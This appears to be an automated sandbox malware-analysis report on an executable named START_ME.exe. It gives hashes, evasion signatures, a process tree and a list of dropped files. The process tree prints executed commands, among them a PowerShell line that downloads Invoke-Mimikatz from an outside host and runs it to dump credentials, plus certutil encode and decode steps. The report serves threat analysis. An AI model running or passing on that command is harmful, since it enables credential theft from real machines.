e253b236af6d45f687424ca1d9354320aae579fbd539b89a85c807e3b52f4574

Analysis

max time kernel
62s
max time network
122s
platform
windows10_x64
resource
win10v20210410
submitted
21-04-2021 17:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

START_ME.exe
Size

981KB
MD5

fbd344cb2db910d8d109b5b63ae11757
SHA1

0a04c5925db22547ee3f638e036366e475d8be99
SHA256

41b987215931740b614e90ba63c4f663d05eda3b8cc22fbb0e7cc7b55f4beec4
SHA512

e5b91ce7f680b7d27d736482454aa288c65f02c7761a6123846df856488231486acaec1644ec74cde4fad4db4d10a0cbeeb234885a4ab2ca73c7d674219e77b3

Score

10^/10

evasion themida

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://marlasinger.tylerdurdenceketi.com/vault/mitre/T1003/Invoke-Mimikatz.ps1

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

30 4056 powershell.exe
32 4056 powershell.exe
34 4056 powershell.exe

flow	pid	process
30	4056	powershell.exe
32	4056	powershell.exe
34	4056	powershell.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

simulation.exesimulation.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	simulation.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	simulation.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	simulation.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	simulation.exe

Loads dropped DLL 16 IoCs

Processes:

simulation.exe

pid	process
200	simulation.exe
200	simulation.exe
200	simulation.exe
200	simulation.exe
200	simulation.exe
200	simulation.exe
200	simulation.exe
200	simulation.exe
200	simulation.exe
200	simulation.exe
200	simulation.exe
200	simulation.exe
200	simulation.exe
200	simulation.exe
200	simulation.exe
200	simulation.exe

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/3152-115-0x00007FF7ABC10000-0x00007FF7AC4FD000-memory.dmp	themida
behavioral2/memory/200-117-0x00007FF7ABC10000-0x00007FF7AC4FD000-memory.dmp	themida

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

simulation.exesimulation.exe

pid process

3152 simulation.exe
200 simulation.exe
200 simulation.exe
Runs net.exe

pid	process
3152	simulation.exe
200	simulation.exe
200	simulation.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3724	powershell.exe
3724	powershell.exe
3724	powershell.exe
1316	powershell.exe
1316	powershell.exe
1316	powershell.exe
2088	powershell.exe
916	powershell.exe
2088	powershell.exe
916	powershell.exe
2088	powershell.exe
916	powershell.exe
4056	powershell.exe
4056	powershell.exe
4056	powershell.exe
2136	powershell.exe
2136	powershell.exe
2136	powershell.exe
3660	powershell.exe
3660	powershell.exe
3660	powershell.exe
3724	powershell.exe
3724	powershell.exe
3724	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

simulation.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: 35	200	simulation.exe
Token: SeDebugPrivilege	3724	powershell.exe
Token: SeDebugPrivilege	1316	powershell.exe
Token: SeDebugPrivilege	2088	powershell.exe
Token: SeDebugPrivilege	916	powershell.exe
Token: SeDebugPrivilege	4056	powershell.exe
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeDebugPrivilege	3660	powershell.exe
Token: SeDebugPrivilege	3724	powershell.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

START_ME.exesimulation.exesimulation.exepowershell.exepowershell.exepowershell.execmd.exenet.exe

description	pid	process	target process
PID 3924 wrote to memory of 3152	3924	START_ME.exe	simulation.exe
PID 3924 wrote to memory of 3152	3924	START_ME.exe	simulation.exe
PID 3152 wrote to memory of 200	3152	simulation.exe	simulation.exe
PID 3152 wrote to memory of 200	3152	simulation.exe	simulation.exe
PID 200 wrote to memory of 3724	200	simulation.exe	powershell.exe
PID 200 wrote to memory of 3724	200	simulation.exe	powershell.exe
PID 3724 wrote to memory of 2600	3724	powershell.exe	certutil.exe
PID 3724 wrote to memory of 2600	3724	powershell.exe	certutil.exe
PID 200 wrote to memory of 1316	200	simulation.exe	powershell.exe
PID 200 wrote to memory of 1316	200	simulation.exe	powershell.exe
PID 1316 wrote to memory of 3944	1316	powershell.exe	certutil.exe
PID 1316 wrote to memory of 3944	1316	powershell.exe	certutil.exe
PID 200 wrote to memory of 916	200	simulation.exe	powershell.exe
PID 200 wrote to memory of 916	200	simulation.exe	powershell.exe
PID 200 wrote to memory of 2088	200	simulation.exe	powershell.exe
PID 200 wrote to memory of 2088	200	simulation.exe	powershell.exe
PID 200 wrote to memory of 4056	200	simulation.exe	powershell.exe
PID 200 wrote to memory of 4056	200	simulation.exe	powershell.exe
PID 200 wrote to memory of 2136	200	simulation.exe	powershell.exe
PID 200 wrote to memory of 2136	200	simulation.exe	powershell.exe
PID 2136 wrote to memory of 3584	2136	powershell.exe	csc.exe
PID 2136 wrote to memory of 3584	2136	powershell.exe	csc.exe
PID 2136 wrote to memory of 3584	2136	powershell.exe	csc.exe
PID 200 wrote to memory of 3660	200	simulation.exe	powershell.exe
PID 200 wrote to memory of 3660	200	simulation.exe	powershell.exe
PID 200 wrote to memory of 3724	200	simulation.exe	powershell.exe
PID 200 wrote to memory of 3724	200	simulation.exe	powershell.exe
PID 200 wrote to memory of 3492	200	simulation.exe	cmd.exe
PID 200 wrote to memory of 3492	200	simulation.exe	cmd.exe
PID 3492 wrote to memory of 2216	3492	cmd.exe	net.exe
PID 3492 wrote to memory of 2216	3492	cmd.exe	net.exe
PID 2216 wrote to memory of 2156	2216	net.exe	net1.exe
PID 2216 wrote to memory of 2156	2216	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\START_ME.exe
"C:\Users\Admin\AppData\Local\Temp\START_ME.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3924

C:\Users\Admin\AppData\Local\Temp\assets\simulation.exe
"assets\simulation.exe"
2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:3152

C:\Users\Admin\AppData\Local\Temp\assets\simulation.exe
"assets\simulation.exe"
3⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "certutil -encode \"C:\Windows\System32\calc.exe\" C:\Users\Admin\AppData\Local\Temp\T1140.txt"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3724

C:\Windows\system32\certutil.exe
"C:\Windows\system32\certutil.exe" -encode C:\Windows\System32\calc.exe C:\Users\Admin\AppData\Local\Temp\T1140.txt
5⤵
PID:2600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "certutil -decode C:\Users\Admin\AppData\Local\Temp\T1140.txt C:\Users\Admin\AppData\Local\Temp\calc_decoded.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1316

C:\Windows\system32\certutil.exe
"C:\Windows\system32\certutil.exe" -decode C:\Users\Admin\AppData\Local\Temp\T1140.txt C:\Users\Admin\AppData\Local\Temp\calc_decoded.exe
5⤵
PID:3944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Remove-Item C:\Users\Admin\AppData\Local\Temp\T1140.txt"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Remove-Item C:\Users\Admin\AppData\Local\Temp\calc_decoded.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('https://marlasinger.tylerdurdenceketi.com/vault/mitre/T1003/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:C:\Users\Admin\AppData\Local\Temp\T1010.exe C:\Users\Admin\AppData\Local\Temp\T1010.cs
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2136

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" -out:C:\Users\Admin\AppData\Local\Temp\T1010.exe C:\Users\Admin\AppData\Local\Temp\T1010.cs
5⤵
PID:3584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command C:\Users\Admin\AppData\Local\Temp\T1010.exe
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "ls -recurse ; get-childitem -recurse ; get-childitem -recurse"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3724

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "net share"
4⤵
- Suspicious use of WriteProcessMemory
PID:3492

C:\Windows\system32\net.exe
net share
5⤵
- Suspicious use of WriteProcessMemory
PID:2216

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 share
6⤵
PID:2156

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
c6b0a774fa56e0169ed7bb7b25c114dd

SHA1
bcdba7d4ecfff2180510850e585b44691ea81ba5

SHA256
b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9

SHA512
42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
7693f58dec20d7f2c91557ffdbcfcc1c

SHA1
cecf9358e98406e68a4cdd078be76878b4699836

SHA256
15b3fc354e44ad2ed4f866a81d175d248db2c76c6ccc0646b0eb12c6d512bead

SHA512
d28f76b2b62ab54651e08f46831701a08739a48bcc1904ae947dd4516fcbc2f7c9880dfa2c0cab87f9127ec34e3909abece5ce243a08729284789a456167addb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c3bce147a65a1dc66cd0ae1770039d0f

SHA1
c7095f3726f40c32b573fd7d53e047cc32bd0350

SHA256
c786828329cb7766ab101f8a5ba3e8873cd9191eb63b8afe59bf271248898d75

SHA512
63a62c5253448e4193b7deb77cccd67628d96a5541e161b2062310bab86d055521d7878e017392f4ed880002da84b000ae90f22fe5792efe00fce058f26faaa9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
496784caee5342237dcd8f1a4df20108

SHA1
a575f15cb3e01db4c6a24fde1f62eceaf02f1c17

SHA256
32878af906a7350763b1ad564dfc93f5a334d6834f4977e7b90fa812d44bbd3b

SHA512
893bbe252fa6918a57bd7216ef83fcea3b1f2eccdadebdf7b1e9561291c793394bac49d91f9f66235c3470a06da8e8bf45fd7cf202f299813d04ad7b12863d23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
496784caee5342237dcd8f1a4df20108

SHA1
a575f15cb3e01db4c6a24fde1f62eceaf02f1c17

SHA256
32878af906a7350763b1ad564dfc93f5a334d6834f4977e7b90fa812d44bbd3b

SHA512
893bbe252fa6918a57bd7216ef83fcea3b1f2eccdadebdf7b1e9561291c793394bac49d91f9f66235c3470a06da8e8bf45fd7cf202f299813d04ad7b12863d23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
60b43b85273b3e8a98241d5de49ba613

SHA1
b1b379b2b8630b68d324e66f8ecadfc5203942ad

SHA256
284a636e12597eb3ee90761cc288c6970ca68d9407a650fe078dfde846bd7360

SHA512
aa8c3dca5d1d1c03c272833565a74d8e57bdcf80b2025f1489223578784762207b919d6a0b6ea02f146628fac7ac84975749a1fdef4f700235dc1cb606ac1df1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
7dab05ea4d323969a2ad4d832f043e7f

SHA1
52134346fea1005a321b311486333db49d8711ff

SHA256
d700bdde46f9ff55625354e1882c42d3f6a900ed7e09dbd4e5dd9367a0071c44

SHA512
5fef809c74e84c75664f34ff60744295389f28c2301314fe874a93a1a558ec1f0151e7562c3e77c1521d23184b414c96648f37e2f5e6c08f39eb680d194c1cc4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
0524187d91d24156ff18e346c4389218

SHA1
b083c5e643fabd7250acf3416b6ad1bdfeda74d6

SHA256
54cabc661d9a65607dfbd5ce3a4ec9bd98d77222b1da3594e61de4613fb88f40

SHA512
ac35b7d36a05fd0d6656ed4a6f9ea7431abc4dd7f4cc335703f8bfe77528eba181ac1366f5ed3aa384e1f3da77fad02ddfae4aae8ee383b92917eb505ab39ec4

Download Submit
C:\Users\Admin\AppData\Local\Temp\T1140.txt
MD5
59b4f324616751c694d7f220c651b5da

SHA1
3952c4b55b53ce3cb10b72019114b7567f862b28

SHA256
82172c22d41e40770a7c2f61605f4d04e760a79f49ef4346afbcc5c240e901ab

SHA512
c2b38c510328769c793fccb58a0834c84431ebf8cf35ad0aef651f44e18653fa4204745d0f00fba4302edc6139e2aaa52cb15c20c8c3558dadc9252f755c1067

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31522\607ffeb1ad2f9c06cd2ad02c.exe.manifest
MD5
133df902b62b663605f112064dfcd3db

SHA1
80be459bee3dc490496f590ad1c8c5793ae3820e

SHA256
5ee162c03dd9b9322608719c28ce26cb5ad6ae9b182f700a9e191542f2a77133

SHA512
03d498bf973da9ba0c5bff81ea0f927078a623a0b69fa0bedb6bb6286af9ad6094267ab04911ac52efd7ef1b495c4d7b235bb880aed5cfd6ab48c9a61639d6e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31522\VCRUNTIME140.dll
MD5
0e675d4a7a5b7ccd69013386793f68eb

SHA1
6e5821ddd8fea6681bda4448816f39984a33596b

SHA256
bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1

SHA512
cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31522\_bz2.pyd
MD5
4079b0e80ef0f97ce35f272410bd29fe

SHA1
19ef1b81a1a0b3286bac74b6af9a18ed381bf92c

SHA256
466d21407f5b589b20c464c51bfe2be420e5a586a7f394908448545f16b08b33

SHA512
21cd5a848f69b0d1715e62dca89d1501f7f09edfe0fa2947cfc473ca72ed3355bfccd32c3a0cdd5f65311e621c89ddb67845945142a4b1bdc5c70e7f7b99ed67

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31522\_ctypes.pyd
MD5
2f21f50d2252e3083555a724ca57b71e

SHA1
49ec351d569a466284b8cc55ee9aeaf3fbf20099

SHA256
09887f07f4316057d3c87e3a907c2235dc6547e54ed4f5f9125f99e547d58bce

SHA512
e71ff1e63105f51a4516498cd09f8156d7208758c5dc9a74e7654844e5cefc6e84f8fe98a1f1bd7a459a98965fbe913cb5edb552fffa1e33dfda709f918dddeb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31522\_hashlib.pyd
MD5
c3b19ad5381b9832e313a448de7c5210

SHA1
51777d53e1ea5592efede1ed349418345b55f367

SHA256
bdf4a536f783958357d2e0055debdc3cf7790ee28beb286452eec0354a346bdc

SHA512
7f8d3b79a58612e850d18e8952d14793e974483c688b5daee217baaa83120fd50d1e036ca4a1b59d748b22951744377257d2a8f094a4b4de1f79fecd4bf06afb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31522\_lzma.pyd
MD5
a567a2ecb4737e5b70500eac25f23049

SHA1
951673dd1a8b5a7f774d34f61b765da2b4026cab

SHA256
a4cba6d82369c57cb38a32d4dacb99225f58206d2dd9883f6fc0355d6ddaec3d

SHA512
97f3b1c20c9a7ed52d9781d1e47f4606579faeae4d98ba09963b99cd2f13426dc0fc2aeb4bb3af18ed584c8ba9d5b6358d8e34687a1d5f74a3954b3f84d12349

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31522\_pytransform.dll
MD5
abca9b21dbfababb998cdc44a18b05cf

SHA1
2cc1b9438b7b7c9c5f8a68a4ad6f40b6b78d3c1f

SHA256
489bf9ffca3eb878b6dd187ae52fb421dd99da432a102325bcdd706cb8816005

SHA512
c02342117215beae5caeea8d764db3fd8fe215b1b0ed96963b4591b0c5f0ac47b6c5616996b78b3b22ad6837bb227ecc4b5eead64ad137a86dbf59ec25a22d16

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31522\_queue.pyd
MD5
2325dab36242fc732c85914ab7ce25af

SHA1
b4a81b312b6e037a0aa4a2e2de5e331cb2803648

SHA256
2ffa512a2a369ccd3713419c6d4e36c2bd5d1967e046663d721d7e7ac9e4ab59

SHA512
13f92c90a81f5dfbc15cadfd31dbc30b5c72c93dc7ad057f4b211388c3a57ab070bd25c0f1212173a0772972b2d3aa2caedbfb7e3513ffc0d83a15dbc9198b87

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31522\_socket.pyd
MD5
d7e7a7592338ce88e131f858a84deec6

SHA1
3add8cd9fbbf7f5fa40d8a972d9ac18282dcf357

SHA256
4ba5d0e236711bdcb29ce9c3138406f7321bd00587b6b362b4ace94379cf52d5

SHA512
96649296e8ccdc06d6787902185e21020a700436fc7007b2aa6464d0af7f9eb66a4485b3d46461106ac5f1d35403183daa1925e842e7df6f2db9e3e833b18fb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31522\_ssl.pyd
MD5
d429ff3fd91943ad8539c076c2a0c75f

SHA1
bb6611ddca8ebe9e4790f20366b89253a27aed02

SHA256
45c8b99ba9e832cab85e9d45b5601b7a1d744652e7f756ec6a6091e1d8398dd4

SHA512
019178eecb9fb3d531e39854685a53fa3df5a84b1424e4a195f0a51ca0587d1524fd8fbd6d4360188ea9c2f54d7019c7d335ec6dc5471128159153c2287b0e18

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31522\base_library.zip
MD5
92ff8e92f431c4b947b009bbf1bd0773

SHA1
99cd5f8c390b47034c6980372028d02919de8760

SHA256
cfcb01f31527948a6d3d91f135050f6e81c2ee1a371f52317d26d3d9cfe79893

SHA512
ae4e751c8eca947bd86193205502fd501be2291c04921557c2fab27d87996e7f10de5d58fc227c39c2f24838827960c0d25e3d0d9c945417e79ec9b64e6689a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31522\certifi\cacert.pem
MD5
1ba3b44f73a6b25711063ea5232f4883

SHA1
1b1a84804f896b7085924f8bf0431721f3b5bdbe

SHA256
bb77f13d3fbec9e98bbf28ac95046b44196c7d8f55ab7720061e99991a829197

SHA512
0dd2a14331308b1de757d56fab43678431e0ad6f5f5b12c32fa515d142bd955f8be690b724e07f41951dd03c9fee00e604f4e0b9309da3ea438c8e9b56ca581b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31522\libcrypto-1_1-x64.dll
MD5
022a61849adab67e3a59bcf4d0f1c40b

SHA1
fca2e1e8c30767c88f7ab5b42fe2bd9abb644672

SHA256
2a57183839c3e9cc4618fb1994c40e47672a8b6daffaa76c5f89cf2542b02c2f

SHA512
94ac596181f0887af7bf02a7ce31327ad443bb7fe2d668217953e0f0c782d19296a80de965008118708afd9bda14fd8c78f49785ebf7abcc37d166b692e88246

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31522\libssl-1_1-x64.dll
MD5
4ec3c7fe06b18086f83a18ffbb3b9b55

SHA1
31d66ffab754fe002914bff2cf58c7381f8588d9

SHA256
9d35d8dd9854a4d4205ae4eafe28c92f8d0e3ac7c494ac4a6a117f6e4b45170c

SHA512
d53ee1f7c082a27ace38bf414529d25223c46bfae1be0a1fbe0c5eab10a7b10d23571fd9812c3be591c34059a4c0028699b4bf50736582b06a17ae1ef1b5341e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31522\pyexpat.pyd
MD5
c07e41d262afd5ea693d38d7217e0ab0

SHA1
bc60d537a91d123e2bfc0954b20773333a83fd61

SHA256
3aea3048fd56f0e4cea65401d36df2185f516aa31fcf92f93c28e569072246bb

SHA512
c25ca6518686634eaa619ebcdc6fc4a992a6074ba1a6dd7f725fb214b7674e47e9f56d6e973a608ee752b44cc7fdb2e6a37d7cfb172d651cf97ac8554d4197c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31522\python37.dll
MD5
62125a78b9be5ac58c3b55413f085028

SHA1
46c643f70dd3b3e82ab4a5d1bc979946039e35b2

SHA256
17c29e6188b022f795092d72a1fb58630a7c723d70ac5bc3990b20cd2eb2a51f

SHA512
e63f4aa8fc5cd1569ae401e283bc8e1445859131eb0db76581b941f1085670c549cbc3fedf911a21c1237b0f3f66f62b10c60e88b923fa058f7fafee18dd0fa4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31522\select.pyd
MD5
c30e5eccf9c62b0b0bc57ed591e16cc0

SHA1
24aece32d4f215516ee092ab72471d1e15c3ba24

SHA256
56d1a971762a1a56a73bdf64727e416ffa9395b8af4efcd218f5203d744e1268

SHA512
3e5c58428d4c166a3d6d3e153b46c4a57cca2e402001932ec90052c4689b7f5ba4c5f122d1a66d282b2a0a0c9916dc5a5b5e5f6dfc952cdb62332ac29cb7b36a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31522\ucrtbase.dll
MD5
0e0bac3d1dcc1833eae4e3e4cf83c4ef

SHA1
4189f4459c54e69c6d3155a82524bda7549a75a6

SHA256
8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

SHA512
a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31522\unicodedata.pyd
MD5
7d1f105cf81820bb6d0962b669897dde

SHA1
6c4897147c05c6d6da98dd969bf84e12cc5682be

SHA256
71b13fd922190081d3aeec8628bd72858cc69ee553e16bf3da412f535108d0e4

SHA512
7546c3afb0440dc0e4c0f24d7b145a4f162cda72068cc51f7dc1a644454b645c0b3c954920c489b0748ba4c1ea2c34e86ba2565770e08077c2fdd02fd237f9d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\calc_decoded.exe
MD5
13974cbf51996ab168c12d662fb3bfb7

SHA1
a2718a03b8e1dfec38e64743ea05aae812ba7ab5

SHA256
0a6e788fdbcbf925112f9cf57124f68ccaa30f3ac1f10904ce46ffe54e930f11

SHA512
253d58e00a033996fb591638c97d8995c62f1eed1bc3af37e1d68e781a8947b95a5734e8314cf72c343daf8b4fd60dd19ab73389eb130147f2e67f6fa8de56e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\msp.log
MD5
adcce9330cd0ab3b8520e23d939089d9

SHA1
8f040c9c3129f1e099c06744775a43a1ad52c70e

SHA256
991369ce73bee01544d7ec3c42d31174f664059fa07ec25bd6c618c3f3da7250

SHA512
a99845cd8aaefcb194b15ac96f30d735c6e2b86dd8a9f260718c6c8bbfe0c5ca4957f0b0c6063598948648ddd259c36f019535a5e7d842ff446901787fc0b4ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\msp.log
MD5
548845fe7bdfd1dc5218b37ba16a3c55

SHA1
133592f7ea431d5cd5e4963139e21495e9a84437

SHA256
b84b31f8925e4cffb6b64841d1e4a116a06604ad5ad11a18f32f49be7008f655

SHA512
b1483c05f0f4ca014e6af784b58e827cab5eb65b00751e55e28e50d918f9fad6878116b8acad0c0e82e3c3f596a22aaf4a55282bd233e67e5d4b779fd7961f44

Download Submit
C:\Users\Admin\AppData\Local\Temp\msp.log
MD5
d321636b555658bdd2c379b7d871e5ce

SHA1
34fc08f0d5371f47906746b3172edc0968ea43ca

SHA256
fbc3acc0a4eec65b41ce208f67b02bfa577654250be10b8200b36f7cd2276728

SHA512
099c7dc96a303959d6ddfe18e119c32c26abae450e0a62c987c84025fb1155ae8f580c2247f9aec530816097d42b51424e4ed4b25c1d2b700b286b74afb9468e

Download Submit
C:\Users\Admin\AppData\Local\Temp\msp.log
MD5
79bbb03ab733154bb9c40e914e1f0b90

SHA1
66847175c090d0de5a1bcb6a4cfdabf80970bbad

SHA256
c4973aa7b71dc5679716fb55bdcf516e42ce28b5d496f6870e98dc2b2ff79155

SHA512
1bc6b9b1716c233a39e66d64e07dfb3b9271a1499f27214c97473828cf5aa08fd8d3ef27088188f4955e52ebfaf810817b5e71f1ba976b1364e56341aee064b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\msp.log
MD5
a8161135a8cc33a9a2c896ac6c8aa286

SHA1
7709ffdffa5d41be2d407a839b6b0850f9dca795

SHA256
99dca322045a4c671b5d1f86c7ebfc41e66543c9a905050b9ca7ca30b44a2b89

SHA512
e65b58b2c1dd55df9671a66beb8d55c1f826bf0736bb81138ae1dbac60d20ba575894bb986bb1a549a2ad629c464ff9449c5672d39ef6b3b9baa619cb4aaf981

Download Submit
C:\Users\Admin\AppData\Local\Temp\msp.log
MD5
2cae5bd990420b138a2bffd4af0669b0

SHA1
4b19903d7dcb0177d9393680fb9f37d76c5cca49

SHA256
0de5ae50d5c3700ba974e2d350c779f319e4e7c344d3bbc878be7aee3e84d921

SHA512
8ad644ee9d805c5911f7883a1fd20541f3f4d9e277c6e397c258dad9e61a29ad0663ac80af0b378683cd95f08039573637f01ba76729e3cf62fe4382932be9c1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\T1010.cs
MD5
d7fd4a2bd2c71738e46448e12975faaa

SHA1
379cecd93345956b8dcd25d05f27eef3cc5be28d

SHA256
9a15c720b3c9f2dc494be525ba624225fcd5933d496db8aa73a6fc93539747eb

SHA512
8dff8c0685477b6b83ac79e84b1e7cd7ec2fdc4da9a312728671ed36ab4512adaa2d5c648626b273d86b73d7cb2897e73257fc3c38a38aa300d64c326b283bab

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI31522\VCRUNTIME140.dll
MD5
0e675d4a7a5b7ccd69013386793f68eb

SHA1
6e5821ddd8fea6681bda4448816f39984a33596b

SHA256
bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1

SHA512
cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI31522\_bz2.pyd
MD5
4079b0e80ef0f97ce35f272410bd29fe

SHA1
19ef1b81a1a0b3286bac74b6af9a18ed381bf92c

SHA256
466d21407f5b589b20c464c51bfe2be420e5a586a7f394908448545f16b08b33

SHA512
21cd5a848f69b0d1715e62dca89d1501f7f09edfe0fa2947cfc473ca72ed3355bfccd32c3a0cdd5f65311e621c89ddb67845945142a4b1bdc5c70e7f7b99ed67

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI31522\_ctypes.pyd
MD5
2f21f50d2252e3083555a724ca57b71e

SHA1
49ec351d569a466284b8cc55ee9aeaf3fbf20099

SHA256
09887f07f4316057d3c87e3a907c2235dc6547e54ed4f5f9125f99e547d58bce

SHA512
e71ff1e63105f51a4516498cd09f8156d7208758c5dc9a74e7654844e5cefc6e84f8fe98a1f1bd7a459a98965fbe913cb5edb552fffa1e33dfda709f918dddeb

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI31522\_hashlib.pyd
MD5
c3b19ad5381b9832e313a448de7c5210

SHA1
51777d53e1ea5592efede1ed349418345b55f367

SHA256
bdf4a536f783958357d2e0055debdc3cf7790ee28beb286452eec0354a346bdc

SHA512
